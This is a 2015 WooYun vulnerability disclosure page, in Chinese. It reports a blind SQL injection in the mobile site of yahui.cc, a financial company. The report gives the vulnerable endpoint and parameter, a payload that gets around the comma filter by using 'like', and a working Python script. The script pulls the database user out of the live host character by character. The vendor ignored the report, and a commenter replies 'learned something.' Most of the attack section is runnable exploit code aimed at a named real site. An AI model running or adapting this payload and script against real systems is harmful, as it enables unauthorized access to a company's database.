当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160445

漏洞标题:金融安全之亚汇某重要站点存在SQL注入漏洞可绕过(附验证脚本)

相关厂商:yahui.cc

漏洞作者: 深度安全实验室

提交时间:2015-12-12 09:10

修复时间:2015-12-17 09:12

公开时间:2015-12-17 09:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-12: 细节已通知厂商并且等待厂商处理中
2015-12-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://m.yahui.cc/


POST:

http://m.yahui.cc/inc/loadMore.php 
page=2&fid=4 and length(user())=24


为真:

1.png

为假:

2.png


user长度为24!
过滤了逗号,使用like吧~

3.png


#!/usr/bin/env python
#coding=utf8
import httplib, urllib, re, time
database = ''
temp_database = ''
httpClient = None
i = 33
while i < 128:
if i == 37:
i = i+1
try:
params = 'user() like 0x'+temp_database+str(hex(i))[2:]+'25'
params="page=2&fid=4 and "+params

params=urllib.quote(params,'?,=,&,/')

headers = {"Host": "m.yahui.cc",
"Content-Type": "application/x-www-form-urlencoded", }
httpClient = httplib.HTTPConnection("m.yahui.cc", 80, timeout=60)
httpClient.request(method='POST', url='/inc/loadMore.php ',body=params,headers = headers)
#st = time.time()
response = httpClient.getresponse()

rp = response.read()
#print len(rp)
if len(rp) == 462:
temp_database = temp_database + str(hex(i))[2:]
database = database + chr(i)
print 'Database: ', database
i = 33
i=i+1

except Exception, e:
print e
finally:
if httpClient:
httpClient.close()

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-17 09:12

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-09 15:35 | 毛猴 ( 普通白帽子 | Rank:104 漏洞数:38 | 一 只 怀 有 梦 想 的 猴 ......)

    学习了